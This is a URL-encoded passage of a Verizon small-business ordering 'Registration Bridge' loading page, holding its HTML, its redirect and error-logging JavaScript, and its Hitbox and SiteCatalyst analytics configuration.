[https://collaborateext.verizon.com/pre/pre/pre.serv###DATA###%3Chtml%3E%3Chead%3E%3Cscript+language%3D%22javascript%22%3EvzLogging_appName%3D%22gbOrdering%22%3B%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22%2Fvztracker%2Fpagetrace%2Fpagetracker.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%2F%2Fnexus.ensighten.com%2Fverizon%2FBootstrap.js%22%3E%3C%2Fscript%3E%0D%0A++++%3Ctitle%3ERegistration+Bridge%3C%2Ftitle%3E%0D%0A++++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%2F%2Fnexus.ensighten.com%2Fverizon%2FBootstrap.js%22%3E%3C%2Fscript%3E%0D%0A++++%3Cmeta+name%3D%22GENERATOR%22+content%3D%22Microsoft+Visual+Studio+.NET+7.1%22%3E%0D%0A++++%3Cmeta+name%3D%22CODE_LANGUAGE%22+content%3D%22C%23%22%3E%0D%0A++++%3Cmeta+name%3D%22vs_defaultClientScript%22+content%3D%22JavaScript%22%3E%0D%0A++++%3Cmeta+name%3D%22vs_targetSchema%22+content%3D%22http%3A%2F%2Fschemas.microsoft.com%2Fintellisense%2Fie5%22%3E%0D%0A++++%3C%21--%3Cscript+language%3D%22javascript%22+src%3D%22..%2Fincludes%2Fjavascript%2Fcss.js%22%3E%3C%2Fscript%3E--%3E%0D%0A+++%0D%0A++++++++%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22..%2FCommon%2Fincludes%2Fcss%2Flayout_new.css%22%3E+%0D%0A++++++++%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22..%2FCommon%2Fincludes%2Fcss%2Forder.css%22%3E+++%0D%0A++++++++%3C%21--%5Bif+lte+IE+6%5D%3E%0D%0A++++++++%3Clink+href%3D%22..%2FCommon%2Fincludes%2Fcss%2Flayout_ie6.css%22+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22%3E%0D%0A++++++++%3C%21%5Bendif%5D--%3E%0D%0A+++%0D%0A++++%3Cscript%3E%0D%0A%09%09var+fadetext%3Dnew+Array%28%29%0D%0A%09%09%2F%2FSET+MESSAGES%0D%0A%09%09fadetext%5B0%5D%3D%22Please+wait+...+retrieving+your+account+information.%22+%2F%2Fplain+image+syntax%0D%0A%09%09fadetext%5B1%5D%3D%22Please+wait+...+retrieving+your+existing+services+information.%22+%0D%0A%09%09fadetext%5B2%5D%3D%22Please+wait+...+ret
rieving+services+available+at+your+address.%22%0D%0A%09%09fadetext%5B3%5D%3D%22Please+wait+...+loading+products+%26+services+list.%22%0D%0A%09%09var+curMessage+%3D+0%3B%0D%0A%09%09var+interval+%3D+5000%3B%0D%0A%09%09%09%0D%0A%09%09function+rotatemsg%28%29%0D%0A%09%09%7B%0D%0A%09%09%09%2F%2Falert%28document.getElementById%28%27alertmsg%27%29.innerTEXT%29%3B%0D%0A%09%09%09setTimeout%28%27rotatemsg%28%29%27%2C+interval%29%3B%0D%0A%09%09%09document.getElementById%28%27alertmsg%27%29.innerHTML+%3D+fadetext%5BcurMessage%5D%3B%0D%0A%09%09%09if+%28curMessage+%3C+fadetext.length-1%29%0D%0A%09%09%09%09curMessage%2B%2B%3B%0D%0A%09%09%09else%0D%0A%09%09%09%09curMessage+%3D+0%3B%0D%0A%09%09%7D%09%09%09%0D%0A%09%09function+BeginPageLoad%28Ctrl1%2CCtrl2%29+%0D%0A%09%09%7B%0D%0A%09%09++++var+otherApps+%3D+%22%22%3B%0D%0A%09%09++++var+locationHref+%3D+%27%27%3B%0D%0A%09%09%09var+catHref%09%09+%3D+%27%27%3B%0D%0A%09%09%09var+LQHref%09%09+%3D+%27%27%3B%0D%0A++++++++++++var+FlowRoute+%3D+%27N%27%3B%0D%0A++++++++++++%2F%2FChanges+made+for+Project+North%0D%0A%0D%0A++++++++++++++var+PostDataToDifferentDataCenter+%3D+%22%22%3B%0D%0A++++++++++++%2F%2FEnd%0D%0A%0D%0A+++++++++%2F%2FChanges+made+for+Project+North+-+if+condition+added%0D%0A+++++++++if+%28+PostDataToDifferentDataCenter+%21%3D+%22Y%22+%29%0D%0A+++++++++%7B%0D%0A++++++++++++%0D%0A%09%09%09%09locationHref+%3D%22RegistrationBridgeProcess.aspx%3FtxtAppId%3D%22++%2B+%22%22+%2B+%22%26from%3D%22++%2B+%22%22+%2B+%22%26FlowRoute%3D%22+%2B+FlowRoute+%2B+%22%26getstarted%3D%22+%2B+LQHref+%2B+%22%26fromChangeAppStart%3D%22++%2B+%22%22+%2B+%22%26MABANNER%3D%22+%2B+%22N%22+%2B+%22%26E%3D%22+%2B+%22NA%22+%2B+%22%26Q%3D%22+%2B+%22NA%22%3B+%3B+%0D%0A%09%09%09%09%0D%0A%09%09%09%3C%21--.net+shutdown+--%3E%0D%0A%09%09%09%0D%0A%0D%0A%0D%0A%09%09%09location.href+%3D+locationHref+%2B+catHref%3B%0D%0A%2F%2F%09%09%09var+appname+%3D+navigator.appName%3B%0D%0A%2F%2F%09%09%09if%28appname+%21%3D+%22Netscape%22%29%0D%0A%2F%2F%09%09%09%7B%0D%0A%2F%2F%09%09%09%
0D%0A%2F%2F%09%09%09++++var+tempHTML+%3D+document.getElementById%28Ctrl1%29.innerHTML%3B%0D%0A%2F%2F%09%09++++++++document.getElementById%28Ctrl1%29.innerHTML+%3D+document.getElementById%28Ctrl2%29.innerHTML%3B%0D%0A%2F%2F%09%09++++++++document.getElementById%28Ctrl2%29.innerHTML+%3D+tempHTML%3B%0D%0A%2F%2F%09%09++++%7D%0D%0A%09%09+%7D+++%0D%0A%09%09+%2F%2FChanges+made+for+Project+North+-+close+brace+added++++++%0D%0A%09%09%7D%0D%0A++++%3C%2Fscript%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody+class%3D%22order%22+onload%3D%22BeginPageLoad%28%27test1%27%2C%27MyDiv%27%29%3Brotatemsg%28%29%3B%22%3E%0D%0A++%3Cform+name%3D%22Form1%22+method%3D%22post%22+action%3D%22RegistrationBridge.aspx%22+id%3D%22Form1%22+style%3D%22text-align%3Acenter%22%3E%0D%0A%3Cdiv%3E%0D%0A%3Cinput+name%3D%22__EVENTTARGET%22+id%3D%22__EVENTTARGET%22+value%3D%22%22+type%3D%22hidden%22%3E%0D%0A%3Cinput+name%3D%22__EVENTARGUMENT%22+id%3D%22__EVENTARGUMENT%22+value%3D%22%22+type%3D%22hidden%22%3E%0D%0A%3Cinput+name%3D%22__VIEWSTATE%22+id%3D%22__VIEWSTATE%22+value%3D%22%2FwEPDwUKLTE3NTcwNTc2MGRk%22+type%3D%22hidden%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0D%0A%2F%2F%3C%21%5BCDATA%5B%0D%0Avar+theForm+%3D+document.forms%5B%27Form1%27%5D%3B%0D%0Aif+%28%21theForm%29+%7B%0D%0A++++theForm+%3D+document.Form1%3B%0D%0A%7D%0D%0Afunction+__doPostBack%28eventTarget%2C+eventArgument%29+%7B%0D%0A++++if+%28%21theForm.onsubmit+%7C%7C+%28theForm.onsubmit%28%29+%21%3D+false%29%29+%7B%0D%0A++++++++theForm.__EVENTTARGET.value+%3D+eventTarget%3B%0D%0A++++++++theForm.__EVENTARGUMENT.value+%3D+eventArgument%3B%0D%0A++++++++theForm.submit%28%29%3B%0D%0A++++%7D%0D%0A%7D%0D%0A%2F%2F%5D%5D%3E%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A++%0D%0A%0D%0A%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2Fespanol.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2FGlobalHeader.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cs
cript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2Foo_engine.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%3Cscript+language%3D%22javascript%22+type%3D%22text%2Fjavascript%22%3E%0D%0Avar+issaveorder+%3D+%27N%27%3B%0D%0Aif+%28%28typeof+MP+%21%3D+%27undefined%27%29+%26%26+%28MP+%21%3D+null%29+%26%26+%28MP.Domains+%21%3D+null%29%29%0D%0A%7B%0D%0A++++MP.Domains%5B%27es%27%5D%3D%27espanol.verizon.com%27%3B%0D%0A+%7D%0D%0A++%2F%2Fwindow.onerror+%3D+function%28errorMsg%2C+url%2C+lineNumber%29+%7Bif%28typeof+Log+%21%3D+%27undefined%27%29Log.Error%28errorMsg%2C+url%2C+lineNumber%29%3B+%7D%0D%0A+window.onerror+%3D+function%28errorMsg%2C+url%2C+lineNumber%29+%0D%0A+%7B%0D%0A+%2F%2Fdebugger%3B%0D%0A+++%2F%2F+alert%28dojoAjaxContent+%2B+%27+-+%27+%2B+url+%2B+%27+-+%27+%2B+lineNumber%29%3B+%0D%0A+++try%7B%0D%0A++++var+dojoAjaxContent+%3D+new+Object%28%29%0D%0A++++dojoAjaxContent%5B%22error%22%5D+%3D+errorMsg%3B%0D%0A++++dojoAjaxContent%5B%22url%22%5D+%3D+url%3B%0D%0A++++dojoAjaxContent%5B%22line%22%5D+%3D+lineNumber%3B%0D%0A++++dojo.xhrPost%28%7B%0D%0A%09%09++++url%3A+%27%2FForYourSmallBiz%2FGoFlow%2FCommon%2FJsError.aspx%27%2C%0D%0A%09%09++++content%3A+dojoAjaxContent%2C%0D%0A%09%09++++load%3A+function%28%29%7B%7D%2C%0D%0A++++++++++++error%3A+function%28err%29%7B%2F%2Falert%28%22ERROR%22%29%3B%0D%0A++++++++++++%7D%2C%0D%0A++++++++%09timeout%3A+80000%09%0D%0A%09++++%7D%29%3B%0D%0A%2F%2F%09++++try%0D%0A%2F%2F%09++++%7B%0D%0A%2F%2F%09++++++++if%28location.href.toUpperCase%28%29.indexOf%28%27VOICE%27%29%3E0%29%0D%0A%2F%2F%09++++++++%7B%0D%0A%2F%2F%09++++++++++++ShowTab%28document.getElementById%28%27lnkLines%27%29%2C+%27dvLines%27%29%3B%0D%0A%2F%2F%09++++++++%7D%0D%0A%2F%2F%09++++%7D%0D%0A%2F%2F%09++++catch%28e%29%0D%0A%2F%2F%09++++%7B%7D%0D%0A%09++++%0D%0A%09++++%7D%0D%0A%09++++%0D%0A%09++++catch%28e%29%0D%0A%09++++%7B%0D%0A%09++++++++%2F%2FDo+Nothing%0D%0A%09++++%7D++%0D%0A%09++++return+true%3B%0D%0A+%7D%0D%0A+%0D%0Afunction+getSelectedTab%28%29+%7B%0D%0A%0D%0A++++++++
document.getElementById%28%22hdnClickYesNo%22%29.value%3D%22Y%22%3B%0D%0A++++++++var+tab%3D%27%27%3B%0D%0A++++++++var+sPath+%3D+window.location.pathname%3B%0D%0A++++++++var+sPage+%3D+sPath.substring%28sPath.lastIndexOf%28%27%2F%27%29+%2B+1%29%3B%0D%0A++++++++if%28sPage.toUpperCase%28%29%3D%3D%27VOICECONFIG.ASPX%27%29%0D%0A++++++++%7B%0D%0A++++++++++var+objControl+%3D+document.getElementById%28%27Header1_hdnSelectedVoiceTab%27%29%3B+%2F%2F%24%28%27input%5Btype%3Dhidden%5D%5Bid*%3DhdnSelectedVoiceTab%5D%27%29%3B++%0D%0A++++++++++if%28tabActive.id%21%3Dnull+%26%26+objControl%21%3Dnull%29%0D%0A++++++++++++objControl.value+%3D+tabActive.id%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A++++%0D%0A++++function+ValidateNavigationHeader%28vzLink%29+%7B%0D%0A++++++++document.getElementById%28%22hdnClickYesNo%22%29.value%3D%22Y%22%3B%0D%0A++++++++var+pmappid+%3D+document.getElementById%28%22curappid%22%29%3B%0D%0A++++++++window.document.forms%5B0%5D.method+%3D+%22post%22%3B%0D%0A++++++++if+%28pmappid+%21%3D+null+%26%26+pmappid.value+%3D%3D+%22AF%22%29+%7B%0D%0A++++++++++++window.document.forms%5B0%5D.action+%3D+%22..%2FMyVerizonNew%2FSaveOrder.aspx%3FClickNo%3DY%22%3B%0D%0A++++++++%7D%0D%0A++++++++else+%7B%0D%0A++++++++++++window.document.forms%5B0%5D.action+%3D+%22..%2FOrderNew%2FSaveOrder.aspx%3FClickNo%3DY%22%3B%0D%0A++++++++%7D%0D%0A++++++++window.document.forms%5B0%5D.submit%28%29%3B%0D%0A++++%7D%0D%0A++++%0D%0A++++function+NavigateHeader%28%29%0D%0A++++%7B++if%28issaveorder.toLowerCase%28%29+%3D%3D+%27false%27%29%0D%0A++++++++++++VZT.ModalHandler.show%28%7B+width%3A+500%2C+height%3A+400%2C+skin%3A+%27default%27%2C+content%3A+%27%23SaveMyOrderPopup%27+%7D%29%3B%0D%0A++++++++else+%0D%0A++++++++++++ValidateNavigation%28%27http%3A%2F%2Fsmallbusiness.verizon.com%27%29%3B%0D%0A++++%7D%0D%0A++++function+HideOverLay%28%29%0D%0A++++%7B%0D%0A++++++++try%0D%0A++++++++%7B%0D%0A++++++++++++VZT.ModalHandler.hide%28%29%3B%0D%0A++++++++%7D%0D%0A++++++++catch%28e%29%0D%0A++++++++%7B%0D%0A++++++++
%7D%0D%0A++++%7D%0D%0A++++function+CheckforSaveOrder%28IsSavecart%29%0D%0A++++%7B%0D%0A++++++++var+tab%3D%27%27%3B%0D%0A++++++++var+sPath+%3D+window.location.pathname%3B%0D%0A++++++++var+sPage+%3D+sPath.substring%28sPath.lastIndexOf%28%27%2F%27%29+%2B+1%29%3B%0D%0A++++++++if%28sPage.toUpperCase%28%29%3D%3D%27VOICECONFIG.ASPX%27%29%0D%0A++++++++%7B%0D%0A++++++++++if%28tabActive.id%21%3Dnull%29%0D%0A++++++++++++tab%3D%27%3FTab%3D%27%2BtabActive.id%3B%0D%0A++++++++%7D%0D%0A++++++var+URL+%3D+%22SaveOrder.aspx%22%2Btab%3B%0D%0A++++++if%28window.location.href.indexOf%28%22MyVerizon%22%29%3E-1%29%0D%0A++++++++URL+%3D+%22..%2FMyVerizonNew%2F%22%2BURL%3B%0D%0A++++++else++++%0D%0A++++++++URL+%3D+%22..%2FOrderNew%2F%22%2BURL%3B%0D%0A++++++++%0D%0A++++++if%28IsSavecart%3D%3D%22Y%22%29%7B%0D%0A++++++++location.href%3DURL%3B+%7D%0D%0A++++++else%7B%0D%0A++++++++location.href%3D%22http%3A%2F%2Fsmallbusiness.verizon.com%22%3B%0D%0A++++++++%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F+Added+to+check+the+availability+of+chat+icon+%28script+return+from+AIMS%29+-+For+Business+specialist+-+Sushanth%0D%0Afunction+AimsChatStatus%28obj%29+%7B%0D%0A++++%2F%2Fdebugger%3B%0D%0A++++if+%28obj+%3D%3D+%22NA%22%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialistHeader%22%29%29+%7B%0D%0A++++++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22block%22%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A++++else+if+%28obj+%3D%3D+%22AA%22%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialistHeader%22%29%29+%7B%0D%0A++++++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22none%22%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%7D%0D%0A%0D%0A%2F%2F+Added+to+check+the+availability+of+chat+icon+%0D%0AsetTimeout%28%27displayBusinessSpecialist%28%29%27%2C+20000%29%3B%0D%0Afunction+displayBusinessSpecialist%28%29+%7B%0D%0A++++%2F%2Fdebugger%3B%0D%0A++++var+varSpanText+%3D+%22%22%3B%0D%0A++++if+%28document.getElementById%28%22aimsChatIcon1%22%29%29+%7B%0
D%0A++++++++varSpanText+%3D+document.getElementById%28%22aimsChatIcon1%22%29.innerHTML%3B%0D%0A++++%7D%0D%0A++++else+if+%28document.getElementById%28%22aimsChatIcon%22%29%29+%7B%0D%0A++++++++varSpanText+%3D+document.getElementById%28%22aimsChatIcon%22%29.innerHTML%3B%0D%0A++++%7D%0D%0A++++var+varSpanIndex+%3D+varSpanText.indexOf%28%22aimsChatIconAvailable%22%29%3B%0D%0A++++if+%28varSpanIndex+%21%3D+-1%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialist%22%29+%21%3D+null%29%0D%0A++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22none%22%3B%0D%0A++++%7D%0D%0A++++else+if+%28varSpanIndex+%3D%3D+-1%29+%7B%0D%0A++++++++if+%28document.getElementById%28%22divSpecialistHeader%22%29%29+%7B%0D%0A++++++++++++if+%28document.getElementById%28%22divSpecialist%22%29+%21%3D+null%29%0D%0A++++++++++++document.getElementById%28%22divSpecialistHeader%22%29.style.display+%3D+%22block%22%3B%0D%0A++++++++%7D%0D%0A++++%7D%0D%0A%7D%0D%0A%2F%2FAdded+OVER+-+Sushanth%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%0D%0A%3Cdiv+class%3D%22vzt%22+style%3D%22padding%3A+5px%3B%22%3E%0D%0A++++%3Cdiv+class%3D%22gb%22%3E%0D%0A++++++++%3Ca+href%3D%22%23%22+onclick%3D%22CheckforSaveOrder%28%27N%27%29%22+class%3D%22fl+logo%22%3E%0D%0A++++++++++++%0D%0A++++++++++++%3Cimg+src%3D%22..%2FCommon%2Fimages%2FOrderNew%2Flogo.gif%22+alt%3D%22Verizon%22%3E%3C%2Fa%3E%0D%0A++++++++%0D%0A++++++++%3Cinput+name%3D%22Header1%24hdnSelectedVoiceTab%22+id%3D%22Header1_hdnSelectedVoiceTab%22+type%3D%22hidden%22%3E%0D%0A++++++++%3Cinput+value%3D%22%22+id%3D%22curappid%22+name%3D%22curappid%22+type%3D%22hidden%22%3E%0D%0A++++++++%0D%0A++++++++%3Cdiv+class%3D%22clear%22%3E%0D%0A++++++++%3C%2Fdiv%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A++++%3Cinput+id%3D%22hdnClickYesNo%22+name%3D%22hdnClickYesNo%22+value%3D%22N%22+type%3D%22hidden%22%3E%0D%0A++++%3Cinput+id%3D%22hdnSAVECARTSUCCESS%22+name%3D%22hdnSAVECARTSUCCESS%22+value%3D%22N%22+type%3D%22hidden%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A++%0D%0A++%3Cdiv+class%3D%2
2fixer%22+style%3D%22height%3A50px%3B%22%3E%3C%2Fdiv%3E++++++%0D%0A++++%3Cdiv+id%3D%22MyDiv%22+name%3D%22MyDiv%22+class%3D%22vzt%22+align%3D%22center%22%3E%0D%0A++++++++%3Cdiv+id%3D%22test1%22+class%3D%22gb%22+style%3D%22margin-top%3A30px%3B%22%3E%0D%0A++++++++++++%3Cdiv+class%3D%22ds%22%3E%0D%0A+++++++++++++++++%3Cdiv+style%3D%22margin-left%3A10%3Bmargin-right%3A10%22%3E+++%0D%0A++++++++++++++++++++%3Cdiv+class%3D%22middle+png%22%3E%0D%0A++++++++++++++++++++++%3Cdiv+class%3D%22bg%22%3E%0D%0A++++++++++++++++++++++++++%3Cdiv+class%3D%22pad_wide%22+align%3D%22center%22%3E%0D%0A++++++++++++++++++++++++++++%3Cdiv+class%3D%22t_center%22+id%3D%22dvProgressBar%22%3E%0D%0A+++++++++++++++++++++++++++++++%3Ch3%3E%3Cdiv+id%3D%22alertmsg%22%3E%3C%2Fdiv%3E%3C%2Fh3%3E%0D%0A+++++++++++++++++++++++++++++++%3Cimg+class%3D%22centered%22+src%3D%22..%2FCommon%2Fimages%2FOrderNew%2Floading.gif%22+visible%3D%22true%22%3E%0D%0A++++++++++++++++++++++++++++++++%3Cdiv+class%3D%22fixer%22+style%3D%22height%3A15px%3B%22%3E%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++++%3C%2Fdiv%3E+%0D%0A++++++++++++++++++++%3Cdiv+class%3D%22bottom+png%22%3E%0D%0A++++++++++++++++++++++%3Cdiv+class%3D%22png%22%3E%0D%0A++++++++++++++++++++++++++++%3Cdiv+class%3D%22png%22%3E%3C%2Fdiv%3E%0D%0A++++++++++++++++++++++%3C%2Fdiv%3E%0D%0A+++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++++++++%3C%2Fdiv%3E%0D%0A++++++++++++%3C%2Fdiv%3E%0D%0A++++++%3C%2Fdiv%3E+%0D%0A++++++++++++%0D%0A+++++%3C%2Fdiv%3E%0D%0A++++++++++%0D%0A+++++%3Cdiv+class%3D%22fixer%22+style%3D%22height%3A150px%3B%22%3E%3C%2Fdiv%3E%0D%0A+++++++++%0D%0A%3Cscript+language%3D%22javascript%22%3EvzLogging_appName%3D%22gbOrdering%22%3B%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22%2Fvztracker%2Fpagetrace%2Fpagetracker.js%22%3E%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2FBro
wserClose.js%22%3E%3C%2Fscript%3E%3C%21--+Changes+made+for+Release+TN+Chagnes+--%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22..%2FCommon%2Fincludes%2Fjs%2Foo_engine.js%22%3E%3C%2Fscript%3E%3C%21--included+for+site+feedback+link+error--%3E%0D%0A%0D%0A%3C%21--+BEGIN%3A+OnlineOpinion+v4.1+EVENT+SURVEy+--%3E%0D%0A%3C%21--+This+product+and+other+products+of+OpinionLab%2C+Inc.+are+protected+by+U.S.+Patent+No.+6606581%2C+6421724%2C+6785717+B1+and+other+patents+pending.+--%3E%0D%0A%09%3Cscript+src%3D%22..%2FCommon%2FIncludes%2Fjs%2FonlineopinionP41s%2Foo_engine.js%22+type%3D%22text%2Fjavascript%22%3E%3C%2Fscript%3E%0D%0A%09%3Cscript+src%3D%22..%2FCommon%2FIncludes%2Fjs%2FonlineopinionP41s%2Foo_conf_en-US_eventSX3.js%22+type%3D%22text%2Fjavascript%22%3E%3C%2Fscript%3E%0D%0A%3C%21--+END++%3A+OnlineOpinion+v4.0%2C+Copyright+2008-2009+Opinionlab%2C+Inc.+--%3E%0D%0A%0D%0A%3Cscript%3E%0D%0A%3C%2Fscript%3E%0D%0A%3C%21--+mp_trans_disable_start+--%3E%0D%0A%3Cscript+language%3D%22javascript1.1%22%3E%0D%0A++var+_hbEC%3D0%2C_hbE%3Dnew+Array%3Bfunction+_hbEvent%28a%2Cb%29%7Bb%3D_hbE%5B_hbEC%2B%2B%5D%3Dnew+Object%28%29%3Bb._N%3Da%3Bb._C%3D0%3Breturn+b%3B%7D%0D%0A++var+hbx%3D_hbEvent%28%22pv%22%29%3Bhbx.vpc%3D%22HBX0250u%22%3Bhbx.gn%3D%22ehg-verizon.hitbox.com%22%3B%0D%0A%0D%0A++%2F%2FBEGIN+EDITABLE+SECTION%0D%0A++%2F%2FCONFIGURATION+VARIABLES%0D%0A%0D%0A++var+varLoc%3Ddocument.location.hostname%3B%0D%0A++var+varURL+%3D+document.location.href%3B%0D%0A++if+%28+varLoc.indexOf%28%27www22%27%29+%3D%3D+0+%7C%7C+varLoc.indexOf%28%27espanol%27%29%3D%3D0+%29%0D%0A++%7B%0D%0A++++if%28varLoc.indexOf%28%27espanol%27%29%3D%3D0+%26%26+varURL.indexOf%28%22stage%22%29+%3E%3D0%29%0D%0A++%7B%0D%0A++hbx.acct%3D%22DM560412PISS%3BDM560507C0VN%22%3B%2F%2F+TEST+ACCTS%0D%0A%0D%0A++%7D%0D%0A++else%0D%0A++%7B%0D%0A++hbx.acct%3D%22DM550928B8DM%3BDM5605078BWM%22%3B%2F%2FPROD+ACCTS%0D%0A%0D%0A++%7D%0D%0A++%7D%0D%0A++else%0D%0A++%7B%0D%0A++hbx.acct%3D%22DM560412PISS%3BDM560507C0VN%22%3B%2F%2F+TEST+ACCTS%0D
%0A++%7D%0D%0A%0D%0A++hbx.pn%3D%22verifyservices3%22%3B%2F%2FPAGE+NAME%28S%29%0D%0A++hbx.mlc%3D%22vz%2Fsmallbus%2Forder%2Fam+service+easy%2F%22%3B%2F%2FCONTENT+CATEGORY%0D%0A++++hbx.pndef%3D%22%22%3B%2F%2FDEFAULT+PAGE+NAME%0D%0A++++hbx.ctdef%3D%22full%22%3B%2F%2FDEFAULT+CONTENT+CATEGORY%0D%0A%0D%0A++++%2F%2FOPTIONAL+PAGE+VARIABLES%0D%0A++++%2F%2FACTION+SETTINGS%0D%0A++++hbx.lc%3D%22y%22%3B+%2F%2Fforce+lower+case+page+names%0D%0A++++hbx.fv%3D%22%22%3B%2F%2FFORM+VALIDATION+MINIMUM+ELEMENTS+OR+SUBMIT+FUNCTION+NAME%0D%0A++++hbx.lt%3D%22auto%22%3B%2F%2FLINK+TRACKING%0D%0A++++hbx.dlf%3D%22n%22%3B%2F%2FDOWNLOAD+FILTER%0D%0A++++hbx.dft%3D%22n%22%3B%2F%2FDOWNLOAD+FILE+NAMING%0D%0A++++hbx.elf%3D%22n%22%3B%2F%2FEXIT+LINK+FILTER%0D%0A%0D%0A++++%2F%2FSEGMENTS+AND+FUNNELS%0D%0A++++hbx.seg%3D%22%22%3B%2F%2FVISITOR+SEGMENTATION%0D%0A++++hbx.fnl%3D%22%22%3B%2F%2FFUNNELS%0D%0A%0D%0A++++%2F%2FCAMPAIGNS%0D%0A++++hbx.cmp%3D%22%22%3B%2F%2FCAMPAIGN+ID%0D%0A++++hbx.cmpn%3D%22%22%3B%2F%2FCAMPAIGN+ID+IN+QUERY%0D%0A++++hbx.dcmp%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+ID%0D%0A++++hbx.dcmpn%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+ID+IN+QUERY%0D%0A++++hbx.dcmpe%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+EXPIRATION%0D%0A++++hbx.dcmpre%3D%22%22%3B%2F%2FDYNAMIC+CAMPAIGN+RESPONSE+EXPIRATION%0D%0A++++hbx.hra%3D%22%22%3B%2F%2FRESPONSE+ATTRIBUTE%0D%0A++++hbx.hqsr%3D%22%22%3B%2F%2FRESPONSE+ATTRIBUTE+IN+REFERRAL+QUERY%0D%0A++++hbx.hqsp%3D%22%22%3B%2F%2FRESPONSE+ATTRIBUTE+IN+QUERY%0D%0A++++hbx.hlt%3D%22%22%3B%2F%2FLEAD+TRACKING%0D%0A++++hbx.hla%3D%22%22%3B%2F%2FLEAD+ATTRIBUTE%0D%0A++++hbx.gp%3D%22%22%3B%2F%2FCAMPAIGN+GOAL%0D%0A++++hbx.gpn%3D%22%22%3B%2F%2FCAMPAIGN+GOAL+IN+QUERY%0D%0A++++hbx.hcn%3D%22%22%3B%2F%2FCONVERSION+ATTRIBUTE%0D%0A++++hbx.hcv%3D%22%22%3B%2F%2FCONVERSION+VALUE%0D%0A++++hbx.cp%3D%22null%22%3B%2F%2FLEGACY+CAMPAIGN%0D%0A++++hbx.cpd%3D%22%22%3B%2F%2FCAMPAIGN+DOMAIN%0D%0A%0D%0A++++var+cv+%3D+_hbEvent%28%22cv%22%29%3B%0D%0A++++%2F%2FCUSTOM+VARIABLES%0D%0A++++hbx.ci%3D%22%22%3B%2F%2FCUSTOMER+ID%0D%0A++++hbx.hc1
%3D%22%22%3B%2F%2FCUSTOM+1%0D%0A++++hbx.hc2%3D%22%22%3B%2F%2FCUSTOM+2%0D%0A++++hbx.hc3%3D%22%22%3B%2F%2FCUSTOM+3%0D%0A++++hbx.hc4%3D%22%22%3B%2F%2FCUSTOM+4%0D%0A++++if+%28varLoc.indexOf%28%27espanol%27%29%3D%3D0+%29%0D%0A++++++hbx.hc4%3D%22spanish%22%3B%0D%0A++++else%0D%0A++++++hbx.hc4%3D%22%22%3B%0D%0A++++hbx.hrf%3D%22%22%3B%2F%2FCUSTOM+REFERRER%0D%0A++++hbx.pec%3D%22%22%3B%2F%2FERROR+CODES%0D%0A%0D%0A++++%2F%2FINSERT+CUSTOM+EVENTS%0D%0A++++hbx.lvm%3D%22300%22%3B%0D%0A++++cv.c8+%3D+%22%22%3B%2F%2FSession+Id%0D%0A%09cv.c9+%3D+%22%22%3B%0D%0A++cv.c10+%3D+%22%22%3B%0D%0A++cv.c11+%3D+%22%22%3B+%2F%2F+Included+to+get+the+c11+Variable+for+the+NC+Scenarios+in+the+Order+Address+Info+Page+and+OOF+Page+and+LBO.%0D%0A++cv.c12+%3D+%22%22%3B+%2F%2F+Qualify+Attempt+Go+Flow+Session+ID+.+For+NC+Flow+--+OrderAddress+Info+Page+and+for+AMF+Registration+Bridge+Page+and+LBO+for+Common%0D%0A++cv.c14+%3D+%22%22%3B+%2F%2F+Session+ID+for+Review+Order+Page%0D%0A++%2F%2FEND+EDITABLE+SECTION%0D%0A%0D%0A++++%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript1.1%22+src%3D%22%2FForYourSmallBiz%2FGoFlow%2Fcommon%2Fincludes%2Fjs%2Fhbx.js%22%3E%3C%2Fscript%3E%0D%0A%3C%21--+mp_trans_disable_end+--%3E%0D%0A%3C%21--+For+WR+75556+-+Site+Catalyst+--%3E%0D%0A%3Cscript+language%3D%22javascript%22%3E%0D%0A++var+varLoc+%3D+document.location.hostname%3B%0D%0A++var+varURL+%3D+document.location.href%3B%0D%0A%0D%0A++var+s_account+%3D+%27verizontelecomglobal%2Cverizontelecomsmb